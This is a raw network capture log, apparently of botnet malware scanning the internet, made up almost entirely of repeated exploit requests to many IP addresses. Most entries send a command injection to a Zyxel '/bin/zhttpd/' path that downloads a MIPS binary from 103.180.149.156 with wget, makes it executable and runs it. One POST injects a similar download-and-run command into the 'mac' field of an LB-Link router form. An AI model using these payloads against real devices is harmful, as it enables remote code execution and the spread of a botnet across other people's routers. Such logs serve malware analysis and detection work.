                                            Feb 2, 2024 06:21:09.571441889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3617192.168.2.154051458.232.195.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.571484089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3618192.168.2.1534962174.196.65.2443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.571527004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3619192.168.2.155554647.68.202.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.571583033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3620192.168.2.1535836117.214.109.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.571611881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3621192.168.2.1540822198.215.36.66443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.571661949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3622192.168.2.1554768189.57.136.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.571696997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3623192.168.2.1553056177.161.110.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.571733952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3624192.168.2.1558874166.10.41.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.571779013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3625192.168.2.156077618.211.81.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.571830988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3626192.168.2.153356077.29.183.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.571865082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3627192.168.2.1558480183.79.192.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.571907043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3628192.168.2.1532940122.247.232.36443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.571950912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3629192.168.2.153486835.203.244.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.571995974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3630192.168.2.1539028130.216.110.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.572024107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3631192.168.2.1551942177.246.215.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.572056055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3632192.168.2.15552121.183.30.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.572089911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3633192.168.2.1543270176.115.119.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.572134018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3634192.168.2.1553486130.173.33.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.572181940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3635192.168.2.1545586192.173.185.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.572204113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3636192.168.2.154520650.223.242.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.572227955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3637192.168.2.1559158194.31.84.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.572278023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3638192.168.2.1544614100.127.161.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.572313070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3639192.168.2.1536622203.6.82.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.572352886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3640192.168.2.1555844222.226.129.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.572395086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3641192.168.2.1559898190.56.149.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.575965881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3642192.168.2.153351283.66.63.498080
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.611238956 CET225OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                            Cookie: user=admin
                                            Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                            Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3643192.168.2.1553708136.47.7.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.583442926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3644192.168.2.1559504207.249.3.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.583479881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3645192.168.2.1536548183.28.13.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.583530903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3646192.168.2.1535872134.153.81.156443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.583551884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3647192.168.2.1550034125.2.68.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.583585024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3648192.168.2.1556474210.226.171.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.583605051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3649192.168.2.15598328.98.146.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.583668947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3650192.168.2.155079250.153.122.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.583710909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3651192.168.2.1537310147.185.1.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.583745003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3652192.168.2.1535062110.219.82.102443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.583776951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3653192.168.2.1536208162.197.105.19443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.583817959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3654192.168.2.1558670133.69.201.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.583853960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3655192.168.2.1553732131.184.104.72443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.583897114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3656192.168.2.155778419.164.32.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.583930016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3657192.168.2.1550344194.13.112.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.583966970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3658192.168.2.1533410193.155.214.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.583992958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3659192.168.2.1550744100.212.82.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.584017038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3660192.168.2.1560420130.111.162.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.584055901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3661192.168.2.1560208219.197.233.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.584090948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3662192.168.2.1535068191.62.24.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.584116936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3663192.168.2.1554082142.204.21.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.584155083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3664192.168.2.1556630143.31.27.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.584213018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3665192.168.2.154625240.96.178.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.584243059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3666192.168.2.153807441.151.125.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.584284067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3667192.168.2.1557098149.253.148.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.584327936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3668192.168.2.1560666191.60.172.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.584366083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3669192.168.2.15372842.66.195.161443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.584397078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3670192.168.2.155773659.47.101.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.584439039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3671192.168.2.156087479.128.164.226443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.584455013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3672192.168.2.1539114131.181.44.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.584496975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3673192.168.2.1554060170.91.24.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.584522009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3674192.168.2.155539218.137.74.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.584561110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3675192.168.2.1537832203.216.126.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.584582090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3676192.168.2.1549752128.172.8.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.584611893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3677192.168.2.155898231.104.22.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.584651947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3678192.168.2.156098499.149.66.160443
                                            TimestampBytes transferredDirectionData
